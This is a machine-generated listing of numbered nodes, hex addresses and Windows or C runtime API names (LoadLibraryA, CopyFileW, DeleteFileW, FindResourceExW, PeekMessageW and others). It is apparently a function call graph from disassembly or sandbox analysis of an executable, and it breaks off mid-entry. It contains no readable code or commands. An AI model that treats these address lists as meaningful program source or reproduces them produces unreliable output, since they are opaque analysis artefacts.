94232->94171 94232->94177 94234->94232 94239 85d37a 60 API calls 94234->94239 94236->94232 94240 85d37a 60 API calls 94236->94240 94237->94175 94238->94174 94239->94234 94240->94236 94241->94190 94242->94208 94243->94204 94245 861ca6 RtlFreeHeap 94244->94245 94246 861ccf _free 94244->94246 94245->94246 94247 861cbb 94245->94247 94246->94217 94254 867c0e 47 API calls __getptd_noexit 94247->94254 94249 861cc1 GetLastError 94249->94246 94250->94222 94251->94224 94252->94224 94253->94224 94254->94249 94256 84d654 94255->94256 94264 84d67e 94255->94264 94257 84d65b 94256->94257 94260 84d6c2 94256->94260 94258 84d6ab 94257->94258 94259 84d666 94257->94259 94258->94264 94268 85dce0 53 API calls 94258->94268 94267 84d9a0 53 API calls __cinit 94259->94267 94260->94258 94269 85dce0 53 API calls 94260->94269 94264->93973 94265->93973 94266->93972 94267->94264 94268->94264 94269->94258 94270->94045 94271->94011 94272->94019 94274 854637 94273->94274 94275 85479f 94273->94275 94277 854643 94274->94277 94278 8b6e05 94274->94278 94276 84ce19 48 API calls 94275->94276 94285 8546e4 Mailbox 94276->94285 94371 854300 335 API calls ___crtGetEnvironmentStringsW 94277->94371 94280 89e822 335 API calls 94278->94280 94281 8b6e11 94280->94281 94282 854739 Mailbox 94281->94282 94372 88cc5c 86 API calls 4 library calls 94281->94372 94282->94045 94284 854659 94284->94281 94284->94282 94284->94285 94288 896ff0 335 API calls 94285->94288 94321 886524 94285->94321 94324 88fa0c 94285->94324 94365 844252 94285->94365 94288->94282 94290->94022 94291->94027 95178 84bd30 94292->95178 94294 853267 94295 853313 Mailbox ___crtGetEnvironmentStringsW 94294->94295 95252 85c36b 86 API calls 94294->95252 94297 88cc5c 86 API calls 94295->94297 94300 84d645 53 API calls 94295->94300 94303 84d6e9 55 API calls 94295->94303 94306 84fe30 335 API calls 94295->94306 94308 85c3c3 48 API calls 94295->94308 94311 85f4ea 48 API calls 94295->94311 94313 85c2d6 48 API calls 94295->94313 94314 846eed 48 API calls 94295->94314 94316 84dcae 50 API calls 94295->94316 94317 853635 Mailbox 94295->94317 95183 842b7a 94295->95183 95190 84e8d0 94295->95190 95253 84d9a0 53 API calls __cinit 94295->95253 95254 84d8c0 53 API calls 94295->95254 95255 89f320 335 API calls 94295->95255 95256 89f5ee 335 API calls 94295->95256 95257 841caa 49 API calls 94295->95257 95258 89cda2 82 API calls Mailbox 94295->95258 95259 8880e3 53 API calls 94295->95259 95260 84d764 55 API calls 94295->95260 95261 88c942 50 API calls 94295->95261 94297->94295 94300->94295 94303->94295 94306->94295 94308->94295 94311->94295 94313->94295 94314->94295 94316->94295 94317->94045 94318->94037 94319->94039 94320->94043 94373 886ca9 GetFileAttributesW 94321->94373 94325 88fa1c __ftell_nolock 94324->94325 94326 88fa44 94325->94326 94465 84d286 48 API calls 94325->94465 94328 84936c 81 API calls 94326->94328 94329 88fa5e 94328->94329 94330 88fb92 94329->94330 94331 88fb68 94329->94331 94332 88fa80 94329->94332 94330->94282 94377 8441a9 94331->94377 94334 84936c 81 API calls 94332->94334 94339 88fa8c _wcscpy _wcschr 94334->94339 94336 88fb8e 94336->94330 94338 84936c 81 API calls 94336->94338 94337 8441a9 136 API calls 94337->94336 94340 88fbc7 94338->94340 94344 88fab0 _wcscat _wcscpy 94339->94344 94348 88fade _wcscat 94339->94348 94401 861dfc 94340->94401 94342 84936c 81 API calls 94343 88fafc _wcscpy 94342->94343 94466 8872cb GetFileAttributesW 94343->94466 94346 84936c 81 API calls 94344->94346 94346->94348 94347 88fb1c __NMSG_WRITE 94347->94330 94350 84936c 81 API calls 94347->94350 94348->94342 94349 88fbeb _wcscat _wcscpy 94352 84936c 81 API calls 94349->94352 94351 88fb48 94350->94351 94467 8860dd 77 API calls 4 library calls 94351->94467 94354 88fc82 94352->94354 94404 88690b 94354->94404 94355 88fb5c 94355->94330 94357 88fca2 94358 886524 3 API calls 94357->94358 94359 88fcb1 94358->94359 94360 84936c 81 API calls 94359->94360 94362 88fce2 94359->94362 94361 88fccb 94360->94361 94410 88bfa4 94361->94410 94364 844252 84 API calls 94362->94364 94364->94330 94366 84425c 94365->94366 94368 844263 94365->94368 94367 8635e4 __fcloseall 83 API calls 94366->94367 94367->94368 94369 844272 94368->94369 94370 844283 FreeLibrary 94368->94370 94369->94282 94370->94369 94371->94284 94372->94282 94374 886529 94373->94374 94375 886cc4 FindFirstFileW 94373->94375 94374->94282 94375->94374 94376 886cd9 FindClose 94375->94376 94376->94374 94468 844214 94377->94468 94382 8441d4 LoadLibraryExW 94478 844291 94382->94478 94383 8b4f73 94385 844252 84 API calls 94383->94385 94387 8b4f7a 94385->94387 94389 844291 3 API calls 94387->94389 94391 8b4f82 94389->94391 94390 8441fb 94390->94391 94392 844207 94390->94392 94504 8444ed 94391->94504 94394 844252 84 API calls 94392->94394 94396 84420c 94394->94396 94396->94336 94396->94337 94398 8b4fa9 94512 844950 94398->94512 94810 861e46 94401->94810 94405 886918 _wcschr __ftell_nolock 94404->94405 94406 861dfc __wsplitpath 47 API calls 94405->94406 94409 88692e _wcscat _wcscpy 94405->94409 94407 88695d 94406->94407 94408 861dfc __wsplitpath 47 API calls 94407->94408 94408->94409 94409->94357 94411 88bfb1 __ftell_nolock 94410->94411 94412 85f4ea 48 API calls 94411->94412 94413 88c00e 94412->94413 94414 8447b7 48 API calls 94413->94414 94415 88c018 94414->94415 94416 88bdb4 GetSystemTimeAsFileTime 94415->94416 94417 88c023 94416->94417 94418 844517 83 API calls 94417->94418 94419 88c036 _wcscmp 94418->94419 94420 88c05a 94419->94420 94421 88c107 94419->94421 94866 88c56d 94420->94866 94423 88c56d 94 API calls 94421->94423 94425 88c0d3 _wcscat 94423->94425 94427 8444ed 64 API calls 94425->94427 94429 88c110 94425->94429 94426 861dfc __wsplitpath 47 API calls 94431 88c088 _wcscat _wcscpy 94426->94431 94428 88c12c 94427->94428 94430 8444ed 64 API calls 94428->94430 94429->94362 94432 88c13c 94430->94432 94434 861dfc __wsplitpath 47 API calls 94431->94434 94433 8444ed 64 API calls 94432->94433 94435 88c157 94433->94435 94434->94425 94436 8444ed 64 API calls 94435->94436 94437 88c167 94436->94437 94438 8444ed 64 API calls 94437->94438 94439 88c182 94438->94439 94440 8444ed 64 API calls 94439->94440 94441 88c192 94440->94441 94442 8444ed 64 API calls 94441->94442 94443 88c1a2 94442->94443 94444 8444ed 64 API calls 94443->94444 94445 88c1b2 94444->94445 94836 88c71a GetTempPathW GetTempFileNameW 94445->94836 94447 88c1be 94448 863499 117 API calls 94447->94448 94458 88c1cf 94448->94458 94449 88c289 94850 8635e4 94449->94850 94451 88c294 94453 88c29a DeleteFileW 94451->94453 94454 88c2ae 94451->94454 94452 8444ed 64 API calls 94452->94458 94453->94429 94455 88c342 CopyFileW 94454->94455 94460 88c2b8 94454->94460 94456 88c358 DeleteFileW 94455->94456 94457 88c36a DeleteFileW 94455->94457 94456->94429 94863 88c6d9 CreateFileW 94457->94863 94458->94429 94458->94449 94458->94452 94837 862aae 94458->94837 94872 88b965 94460->94872 94464 88c331 DeleteFileW 94464->94429 94465->94326 94466->94347 94467->94355 94517 844339 94468->94517 94471 84423c 94473 844244 FreeLibrary 94471->94473 94474 8441bb 94471->94474 94473->94474 94475 863499 94474->94475 94525 8634ae 94475->94525 94477 8441c8 94477->94382 94477->94383 94721 8442e4 94478->94721 94481 8442b8 94482 8442c1 FreeLibrary 94481->94482 94483 8441ec 94481->94483 94482->94483 94485 844380 94483->94485 94486 85f4ea 48 API calls 94485->94486 94487 844395 94486->94487 94729 8447b7 94487->94729 94489 8443a1 ___crtGetEnvironmentStringsW 94490 8443dc 94489->94490 94491 8444d1 94489->94491 94492 844499 94489->94492 94493 844950 57 API calls 94490->94493 94743 88c750 93 API calls 94491->94743 94732 84406b CreateStreamOnHGlobal 94492->94732 94501 8443e5 94493->94501 94496 8444ed 64 API calls 94496->94501 94497 844479 94497->94390 94499 8b4ed7 94500 844517 83 API calls 94499->94500 94502 8b4eeb 94500->94502 94501->94496 94501->94497 94501->94499 94738 844517 94501->94738 94503 8444ed 64 API calls 94502->94503 94503->94497 94505 8b4fc0 94504->94505 94506 8444ff 94504->94506 94767 86381e 94506->94767 94509 88bf5a 94787 88bdb4 94509->94787 94511 88bf70 94511->94398 94513 84495f 94512->94513 94516 8b5002 94512->94516 94792 863e65 94513->94792 94515 844967 94521 84434b 94517->94521 94520 844321 LoadLibraryA GetProcAddress 94520->94471 94522 84422f 94521->94522 94523 844354 LoadLibraryA 94521->94523 94522->94471 94522->94520 94523->94522 94524 844365 GetProcAddress 94523->94524 94524->94522 94527 8634ba __mtinitlocknum 94525->94527 94526 8634cd 94573 867c0e 47 API calls __getptd_noexit 94526->94573 94527->94526 94529 8634fe 94527->94529 94544 86e4c8 94529->94544 94530 8634d2 94574 866e10 8 API calls __vswprintf_l 94530->94574 94533 863503 94534 86350c 94533->94534 94535 863519 94533->94535 94575 867c0e 47 API calls __getptd_noexit 94534->94575 94537 863543 94535->94537 94538 863523 94535->94538 94558 86e5e0 94537->94558 94576 867c0e 47 API calls __getptd_noexit 94538->94576 94542 8634dd __mtinitlocknum @_EH4_CallFilterFunc@8 94542->94477 94545 86e4d4 __mtinitlocknum 94544->94545 94578 867cf4 94545->94578 94547 86e559 94614 8669d0 47 API calls __crtCompareStringA_stat 94547->94614 94548 86e552 94585 86e5d7 94548->94585 94551 86e560 94551->94548 94553 86e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94551->94553 94552 86e5cc __mtinitlocknum 94552->94533 94553->94548 94556 86e4e2 94556->94547 94556->94548 94588 867d7c 94556->94588 94612 864e5b 48 API calls __lock 94556->94612 94613 864ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94556->94613 94566 86e600 __wopenfile 94558->94566 94559 86e61a 94626 867c0e 47 API calls __getptd_noexit 94559->94626 94561 86e61f 94627 866e10 8 API calls __vswprintf_l 94561->94627 94563 86354e 94577 863570 LeaveCriticalSection LeaveCriticalSection _fprintf 94563->94577 94564 86e838 94623 8763c9 94564->94623 94566->94559 94566->94566 94572 86e7d5 94566->94572 94628 86185b 59 API calls 3 library calls 94566->94628 94568 86e7ce 94568->94572 94629 86185b 59 API calls 3 library calls 94568->94629 94570 86e7ed 94570->94572 94630 86185b 59 API calls 3 library calls 94570->94630 94572->94559 94572->94564 94573->94530 94574->94542 94575->94542 94576->94542 94577->94542 94579 867d05 94578->94579 94580 867d18 EnterCriticalSection 94578->94580 94581 867d7c __mtinitlocknum 46 API calls 94579->94581 94580->94556 94582 867d0b 94581->94582 94582->94580 94615 86115b 47 API calls 3 library calls 94582->94615 94616 867e58 LeaveCriticalSection 94585->94616 94587 86e5de 94587->94552 94589 867d88 __mtinitlocknum 94588->94589 94590 867d91 94589->94590 94591 867da9 94589->94591 94617 8681c2 47 API calls __NMSG_WRITE 94590->94617 94598 867e11 __mtinitlocknum 94591->94598 94606 867da7 94591->94606 94593 867d96 94618 86821f 47 API calls 6 library calls 94593->94618 94596 867dbd 94599 867dc4 94596->94599 94600 867dd3 94596->94600 94597 867d9d 94619 861145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94597->94619 94598->94556 94621 867c0e 47 API calls __getptd_noexit 94599->94621 94601 867cf4 __lock 46 API calls 94600->94601 94605 867dda 94601->94605 94604 867dc9 94604->94598 94607 867dfe 94605->94607 94608 867de9 InitializeCriticalSectionAndSpinCount 94605->94608 94606->94591 94620 8669d0 47 API calls __crtCompareStringA_stat 94606->94620 94610 861c9d _free 46 API calls 94607->94610 94609 867e04 94608->94609 94622 867e1a LeaveCriticalSection _doexit 94609->94622 94610->94609 94612->94556 94613->94556 94614->94551 94616->94587 94617->94593 94618->94597 94620->94596 94621->94604 94622->94598 94631 875bb1 94623->94631 94625 8763e2 94625->94563 94626->94561 94627->94563 94628->94568 94629->94570 94630->94572 94634 875bbd __mtinitlocknum 94631->94634 94632 875bcf 94718 867c0e 47 API calls __getptd_noexit 94632->94718 94634->94632 94636 875c06 94634->94636 94635 875bd4 94719 866e10 8 API calls __vswprintf_l 94635->94719 94642 875c78 94636->94642 94639 875c23 94720 875c4c LeaveCriticalSection __unlock_fhandle 94639->94720 94641 875bde __mtinitlocknum 94641->94625 94643 875c98 94642->94643 94644 86273b __wsopen_helper 47 API calls 94643->94644 94647 875cb4 94644->94647 94645 866e20 __invoke_watson 8 API calls 94646 8763c8 94645->94646 94649 875bb1 __wsopen_helper 104 API calls 94646->94649 94648 875cee 94647->94648 94656 875d11 94647->94656 94665 875deb 94647->94665 94650 867bda __set_osfhnd 47 API calls 94648->94650 94651 8763e2 94649->94651 94652 875cf3 94650->94652 94651->94639 94653 867c0e __mtinitlocknum 47 API calls 94652->94653 94654 875d00 94653->94654 94655 866e10 __vswprintf_l 8 API calls 94654->94655 94658 875d0a 94655->94658 94657 875dcf 94656->94657 94664 875dad 94656->94664 94659 867bda __set_osfhnd 47 API calls 94657->94659 94658->94639 94660 875dd4 94659->94660 94661 867c0e __mtinitlocknum 47 API calls 94660->94661 94662 875de1 94661->94662 94663 866e10 __vswprintf_l 8 API calls 94662->94663 94663->94665 94666 86a979 __wsopen_helper 52 API calls 94664->94666 94665->94645 94667 875e7b 94666->94667 94668 875ea6 94667->94668 94669 875e85 94667->94669 94670 875b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94668->94670 94671 867bda __set_osfhnd 47 API calls 94669->94671 94680 875ec8 94670->94680 94672 875e8a 94671->94672 94674 867c0e __mtinitlocknum 47 API calls 94672->94674 94673 875f46 GetFileType 94675 875f93 94673->94675 94676 875f51 GetLastError 94673->94676 94678 875e94 94674->94678 94688 86ac0b __set_osfhnd 48 API calls 94675->94688 94679 867bed __dosmaperr 47 API calls 94676->94679 94677 875f14 GetLastError 94681 867bed __dosmaperr 47 API calls 94677->94681 94682 867c0e __mtinitlocknum 47 API calls 94678->94682 94683 875f78 CloseHandle 94679->94683 94680->94673 94680->94677 94684 875b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94680->94684 94685 875f39 94681->94685 94682->94658 94683->94685 94686 875f86 94683->94686 94687 875f09 94684->94687 94690 867c0e __mtinitlocknum 47 API calls 94685->94690 94689 867c0e __mtinitlocknum 47 API calls 94686->94689 94687->94673 94687->94677 94693 875fb1 94688->94693 94691 875f8b 94689->94691 94690->94665 94691->94685 94692 87616c 94692->94665 94695 87633f CloseHandle 94692->94695 94693->94692 94694 86f82f __lseeki64_nolock 49 API calls 94693->94694 94711 876032 94693->94711 94696 87601b 94694->94696 94697 875b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 94695->94697 94699 867bda __set_osfhnd 47 API calls 94696->94699 94716 87603a 94696->94716 94698 876366 94697->94698 94701 8761f6 94698->94701 94702 87636e GetLastError 94698->94702 94699->94711 94700 86ee0e 59 API calls __wsopen_helper 94700->94716 94701->94665 94703 867bed __dosmaperr 47 API calls 94702->94703 94705 87637a 94703->94705 94704 86f82f 49 API calls __lseeki64_nolock 94704->94716 94707 86ab1e __free_osfhnd 48 API calls 94705->94707 94706 86ea9c __close_nolock 50 API calls 94706->94716 94707->94701 94708 876f40 __chsize_nolock 81 API calls 94708->94716 94709 86af61 __flush 78 API calls 94709->94711 94710 86f82f 49 API calls __lseeki64_nolock 94710->94711 94711->94692 94711->94709 94711->94710 94711->94716 94712 8761e9 94714 86ea9c __close_nolock 50 API calls 94712->94714 94713 8761d2 94713->94692 94715 8761f0 94714->94715 94717 867c0e __mtinitlocknum 47 API calls 94715->94717 94716->94700 94716->94704 94716->94706 94716->94708 94716->94711 94716->94712 94716->94713 94717->94701 94718->94635 94719->94641 94720->94641 94725 8442f6 94721->94725 94724 8442cc LoadLibraryA GetProcAddress 94724->94481 94726 8442aa 94725->94726 94727 8442ff LoadLibraryA 94725->94727 94726->94481 94726->94724 94727->94726 94728 844310 GetProcAddress 94727->94728 94728->94726 94730 85f4ea 48 API calls 94729->94730 94731 8447c9 94730->94731 94731->94489 94733 844085 FindResourceExW 94732->94733 94737 8440a2 94732->94737 94734 8b4f16 LoadResource 94733->94734 94733->94737 94735 8b4f2b SizeofResource 94734->94735 94734->94737 94736 8b4f3f LockResource 94735->94736 94735->94737 94736->94737 94737->94490 94739 844526 94738->94739 94740 8b4fe0 94738->94740 94744 863a8d 94739->94744 94742 844534 94742->94501 94743->94490 94745 863a99 __mtinitlocknum 94744->94745 94746 863aa7 94745->94746 94747 863acd 94745->94747 94757 867c0e 47 API calls __getptd_noexit 94746->94757 94759 864e1c 94747->94759 94750 863aac 94758 866e10 8 API calls __vswprintf_l 94750->94758 94754 863ae2 94766 863b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94754->94766 94756 863ab7 __mtinitlocknum 94756->94742 94757->94750 94758->94756 94760 864e4e EnterCriticalSection 94759->94760 94761 864e2c 94759->94761 94764 863ad3 94760->94764 94761->94760 94762 864e34 94761->94762 94763 867cf4 __lock 47 API calls 94762->94763 94763->94764 94765 8639fe 81 API calls 3 library calls 94764->94765 94765->94754 94766->94756 94770 863839 94767->94770 94769 844510 94769->94509 94771 863845 __mtinitlocknum 94770->94771 94772 863880 __mtinitlocknum 94771->94772 94773 86385b _memset 94771->94773 94774 863888 94771->94774 94772->94769 94783 867c0e 47 API calls __getptd_noexit 94773->94783 94775 864e1c __lock_file 48 API calls 94774->94775 94776 86388e 94775->94776 94785 86365b 62 API calls 7 library calls 94776->94785 94779 863875 94784 866e10 8 API calls __vswprintf_l 94779->94784 94780 8638a4 94786 8638c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94780->94786 94783->94779 94784->94772 94785->94780 94786->94772 94790 86344a GetSystemTimeAsFileTime 94787->94790 94789 88bdc3 94789->94511 94791 863478 __aulldiv 94790->94791 94791->94789 94793 863e71 __mtinitlocknum 94792->94793 94794 863e94 94793->94794 94795 863e7f 94793->94795 94797 864e1c __lock_file 48 API calls 94794->94797 94806 867c0e 47 API calls __getptd_noexit 94795->94806 94799 863e9a 94797->94799 94798 863e84 94807 866e10 8 API calls __vswprintf_l 94798->94807 94808 863b0c 55 API calls 6 library calls 94799->94808 94802 863ea5 94809 863ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94802->94809 94804 863eb7 94805 863e8f __mtinitlocknum 94804->94805 94805->94515 94806->94798 94807->94805 94808->94802 94809->94804 94811 861e61 94810->94811 94814 861e55 94810->94814 94834 867c0e 47 API calls __getptd_noexit 94811->94834 94813 862019 94818 861e41 94813->94818 94835 866e10 8 API calls __vswprintf_l 94813->94835 94814->94811 94821 861ed4 94814->94821 94829 869d6b 47 API calls 2 library calls 94814->94829 94817 861fa0 94817->94811 94817->94818 94822 861fb0 94817->94822 94818->94349 94819 861f5f 94819->94811 94820 861f7b 94819->94820 94831 869d6b 47 API calls 2 library calls 94819->94831 94820->94811 94820->94818 94825 861f91 94820->94825 94821->94811 94828 861f41 94821->94828 94830 869d6b 47 API calls 2 library calls 94821->94830 94833 869d6b 47 API calls 2 library calls 94822->94833 94832 869d6b 47 API calls 2 library calls 94825->94832 94828->94817 94828->94819 94829->94821 94830->94828 94831->94820 94832->94818 94833->94818 94834->94813 94835->94818 94836->94447 94838 862aba __mtinitlocknum 94837->94838 94839 862ad4 94838->94839 94840 862aec 94838->94840 94841 862ae4 __mtinitlocknum 94838->94841 94915 867c0e 47 API calls __getptd_noexit 94839->94915 94842 864e1c __lock_file 48 API calls 94840->94842 94841->94458 94844 862af2 94842->94844 94903 862957 94844->94903 94845 862ad9 94916 866e10 8 API calls __vswprintf_l 94845->94916 94851 8635f0 __mtinitlocknum 94850->94851 94852 863604 94851->94852 94853 86361c 94851->94853 95093 867c0e 47 API calls __getptd_noexit 94852->95093 94856 864e1c __lock_file 48 API calls 94853->94856 94860 863614 __mtinitlocknum 94853->94860 94855 863609 95094 866e10 8 API calls __vswprintf_l 94855->95094 94857 86362e 94856->94857 95077 863578 94857->95077 94860->94451 94864 88c6ff SetFileTime CloseHandle 94863->94864 94865 88c715 94863->94865 94864->94865 94865->94429 94871 88c581 __tzset_nolock _wcscmp 94866->94871 94867 88c05f 94867->94426 94867->94429 94868 8444ed 64 API calls 94868->94871 94869 88bf5a GetSystemTimeAsFileTime 94869->94871 94870 844517 83 API calls 94870->94871 94871->94867 94871->94868 94871->94869 94871->94870 94873 88b97e 94872->94873 94874 88b970 94872->94874 94876 88b9c3 94873->94876 94877 863499 117 API calls 94873->94877 94898 88b987 94873->94898 94875 863499 117 API calls 94874->94875 94875->94873 95167 88bbe8 64 API calls 3 library calls 94876->95167 94879 88b9a8 94877->94879 94879->94876 94881 88b9b1 94879->94881 94880 88ba07 94882 88ba0b 94880->94882 94883 88ba2c 94880->94883 94885 8635e4 __fcloseall 83 API calls 94881->94885 94881->94898 94884 88ba18 94882->94884 94887 8635e4 __fcloseall 83 API calls 94882->94887 95168 88b7e5 47 API calls __crtCompareStringA_stat 94883->95168 94889 8635e4 __fcloseall 83 API calls 94884->94889 94884->94898 94885->94898 94887->94884 94888 88ba34 94890 88ba5a 94888->94890 94891 88ba3a 94888->94891 94889->94898 95169 88ba8a 90 API calls 94890->95169 94893 88ba47 94891->94893 94894 8635e4 __fcloseall 83 API calls 94891->94894 94896 8635e4 __fcloseall 83 API calls 94893->94896 94893->94898 94894->94893 94895 88ba61 95170 88bb64 94895->95170 94896->94898 94898->94457 94898->94464 94900 8635e4 __fcloseall 83 API calls 94902 88ba75 94900->94902 94901 8635e4 __fcloseall 83 API calls 94901->94898 94902->94898 94902->94901 94904 862966 94903->94904 94910 862984 94903->94910 94905 862974 94904->94905 94904->94910 94913 86299c ___crtGetEnvironmentStringsW 94904->94913 94950 867c0e 47 API calls __getptd_noexit 94905->94950 94907 862979 94951 866e10 8 API calls __vswprintf_l 94907->94951 94917 862b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94910->94917 94913->94910 94918 862933 94913->94918 94925 86af61 94913->94925 94952 862c84 94913->94952 94958 868e63 78 API calls 6 library calls 94913->94958 94915->94845 94916->94841 94917->94841 94919 862952 94918->94919 94920 86293d 94918->94920 94919->94913 94959 867c0e 47 API calls __getptd_noexit 94920->94959 94922 862942 94960 866e10 8 API calls __vswprintf_l 94922->94960 94924 86294d 94924->94913 94926 86af6d __mtinitlocknum 94925->94926 94927 86af75 94926->94927 94928 86af8d 94926->94928 95034 867bda 47 API calls __getptd_noexit 94927->95034 94929 86b022 94928->94929 94933 86afbf 94928->94933 95039 867bda 47 API calls __getptd_noexit 94929->95039 94932 86af7a 95035 867c0e 47 API calls __getptd_noexit 94932->95035 94961 86a8ed 94933->94961 94934 86b027 95040 867c0e 47 API calls __getptd_noexit 94934->95040 94938 86afc5 94940 86afeb 94938->94940 94941 86afd8 94938->94941 94939 86b02f 95041 866e10 8 API calls __vswprintf_l 94939->95041 95036 867c0e 47 API calls __getptd_noexit 94940->95036 94970 86b043 94941->94970 94943 86af82 __mtinitlocknum 94943->94913 94946 86afe4 95038 86b01a LeaveCriticalSection __unlock_fhandle 94946->95038 94947 86aff0 95037 867bda 47 API calls __getptd_noexit 94947->95037 94950->94907 94951->94910 94953 862c97 94952->94953 94957 862cbb 94952->94957 94954 862933 __flush 47 API calls 94953->94954 94953->94957 94955 862cb4 94954->94955 94956 86af61 __flush 78 API calls 94955->94956 94956->94957 94957->94913 94958->94913 94959->94922 94960->94924 94962 86a8f9 __mtinitlocknum 94961->94962 94963 86a946 EnterCriticalSection 94962->94963 94964 867cf4 __lock 47 API calls 94962->94964 94965 86a96c __mtinitlocknum 94963->94965 94966 86a91d 94964->94966 94965->94938 94967 86a93a 94966->94967 94968 86a928 InitializeCriticalSectionAndSpinCount 94966->94968 95042 86a970 LeaveCriticalSection _doexit 94967->95042 94968->94967 94971 86b050 __ftell_nolock 94970->94971 94972 86b0ac 94971->94972 94973 86b08d 94971->94973 95004 86b082 94971->95004 94978 86b105 94972->94978 94979 86b0e9 94972->94979 95052 867bda 47 API calls __getptd_noexit 94973->95052 94976 86b86b 94976->94946 94977 86b092 95053 867c0e 47 API calls __getptd_noexit 94977->95053 94981 86b11c 94978->94981 95058 86f82f 49 API calls 3 library calls 94978->95058 95055 867bda 47 API calls __getptd_noexit 94979->95055 95043 873bf2 94981->95043 94983 86b099 95054 866e10 8 API calls __vswprintf_l 94983->95054 94986 86b0ee 95056 867c0e 47 API calls __getptd_noexit 94986->95056 94990 86b0f5 95066 86a70c 95004->95066 95034->94932 95035->94943 95036->94947 95037->94946 95038->94943 95039->94934 95040->94939 95041->94943 95042->94963 95044 873bfd 95043->95044 95045 873c0a 95043->95045 95073 867c0e 47 API calls __getptd_noexit 95044->95073 95048 873c16 95045->95048 95074 867c0e 47 API calls __getptd_noexit 95045->95074 95047 873c02 95050 873c37 95052->94977 95053->94983 95054->95004 95055->94986 95056->94990 95058->94981 95067 86a716 IsProcessorFeaturePresent 95066->95067 95068 86a714 95066->95068 95070 8737b0 95067->95070 95068->94976 95076 87375f 5 API calls 2 library calls 95070->95076 95072 873893 95072->94976 95073->95047 95074->95050 95076->95072 95078 863587 95077->95078 95079 86359b 95077->95079 95123 867c0e 47 API calls __getptd_noexit 95078->95123 95081 863597 95079->95081 95083 862c84 __flush 78 API calls 95079->95083 95095 863653 LeaveCriticalSection LeaveCriticalSection _fprintf 95081->95095 95082 86358c 95124 866e10 8 API calls __vswprintf_l 95082->95124 95085 8635a7 95083->95085 95096 86eb36 95085->95096 95088 862933 __flush 47 API calls 95089 8635b5 95088->95089 95100 86e9d2 95089->95100 95091 8635bb 95091->95081 95092 861c9d _free 47 API calls 95091->95092 95092->95081 95093->94855 95094->94860 95095->94860 95097 8635af 95096->95097 95098 86eb43 95096->95098 95097->95088 95098->95097 95099 861c9d _free 47 API calls 95098->95099 95099->95097 95101 86e9de __mtinitlocknum 95100->95101 95102 86e9e6 95101->95102 95103 86e9fe 95101->95103 95140 867bda 47 API calls __getptd_noexit 95102->95140 95105 86ea7b 95103->95105 95110 86ea28 95103->95110 95144 867bda 47 API calls __getptd_noexit 95105->95144 95106 86e9eb 95141 867c0e 47 API calls __getptd_noexit 95106->95141 95109 86ea80 95145 867c0e 47 API calls __getptd_noexit 95109->95145 95112 86a8ed ___lock_fhandle 49 API calls 95110->95112 95114 86ea2e 95112->95114 95113 86ea88 95146 866e10 8 API calls __vswprintf_l 95113->95146 95116 86ea41 95114->95116 95117 86ea4c 95114->95117 95125 86ea9c 95116->95125 95142 867c0e 47 API calls __getptd_noexit 95117->95142 95119 86e9f3 __mtinitlocknum 95119->95091 95121 86ea47 95143 86ea73 LeaveCriticalSection __unlock_fhandle 95121->95143 95123->95082 95124->95081 95147 86aba4 95125->95147 95127 86eb00 95129 86eaaa 95129->95127 95131 86aba4 __lseeki64_nolock 47 API calls 95129->95131 95139 86eade 95129->95139 95139->95127 95140->95106 95141->95119 95142->95121 95143->95119 95144->95109 95145->95113 95146->95119 95148 86abc4 95147->95148 95149 86abaf 95147->95149 95154 86abe9 95148->95154 95164 867bda 47 API calls __getptd_noexit 95148->95164 95162 867bda 47 API calls __getptd_noexit 95149->95162 95151 86abb4 95154->95129 95155 86abf3 95165 867c0e 47 API calls __getptd_noexit 95155->95165 95162->95151 95164->95155 95167->94880 95168->94888 95169->94895 95171 88bb77 95170->95171 95172 88bb71 95170->95172 95174 861c9d _free 47 API calls 95171->95174 95176 88bb88 95171->95176 95173 861c9d _free 47 API calls 95172->95173 95173->95171 95174->95176 95175 861c9d _free 47 API calls 95177 88ba68 95175->95177 95176->95175 95176->95177 95177->94900 95177->94902 95179 84bd3f 95178->95179 95182 84bd5a 95178->95182 95180 84bdfa 48 API calls 95179->95180 95181 84bd47 CharUpperBuffW 95180->95181 95181->95182 95182->94294 95184 8b436a 95183->95184 95185 842b8b 95183->95185 95186 85f4ea 48 API calls 95185->95186 95187 842b92 95186->95187 95188 842bb3 95187->95188 95262 842bce 48 API calls 95187->95262 95188->94295 95191 84e8f6 95190->95191 95250 84e906 Mailbox 95190->95250 95192 84ed52 95191->95192 95191->95250 95346 85e3cd 335 API calls 95192->95346 95194 84ebdd 95194->94295 95196 84ed63 95196->95194 95198 84ed70 95196->95198 95197 84e94c PeekMessageW 95197->95250 95348 85e312 335 API calls Mailbox 95198->95348 95200 84ed77 LockWindowUpdate DestroyWindow 95202 84ed97 GetMessageW 95200->95202 95201 8b526e Sleep 95201->95250 95202->95194 95205 84eda9 95202->95205 95203 84ebc7 95203->95194 95347 842ff6 16 API calls 95203->95347 95208 8b59ef TranslateMessage DispatchMessageW GetMessageW 95205->95208 95207 84ed21 PeekMessageW 95207->95250 95208->95208 95210 8b5a1f 95208->95210 95209 84ebf7 timeGetTime 95209->95250 95210->95194 95212 85f4ea 48 API calls 95212->95250 95213 846eed 48 API calls 95213->95250 95214 84ed3a TranslateMessage DispatchMessageW 95214->95207 95215 8b5557 WaitForSingleObject 95216 8b5574 GetExitCodeProcess CloseHandle 95215->95216 95215->95250 95216->95250 95217 84d7f7 48 API calls 95245 8b5429 Mailbox 95217->95245 95218 8b588f Sleep 95218->95245 95219 84edae timeGetTime 95349 841caa 49 API calls 95219->95349 95222 8b5733 Sleep 95222->95245 95224 8b5926 GetExitCodeProcess 95227 8b593c WaitForSingleObject 95224->95227 95228 8b5952 CloseHandle 95224->95228 95226 85dc38 timeGetTime 95226->95245 95227->95228 95227->95250 95228->95245 95229 8b5445 Sleep 95229->95250 95230 8b5432 Sleep 95230->95229 95231 8a8c4b 108 API calls 95231->95245 95232 842c79 107 API calls 95232->95245 95234 8b59ae Sleep 95234->95250 95235 841caa 49 API calls 95235->95250 95236 84ce19 48 API calls 95236->95245 95240 84d6e9 55 API calls 95240->95245 95241 84fe30 311 API calls 95241->95250 95243 8545e0 311 API calls 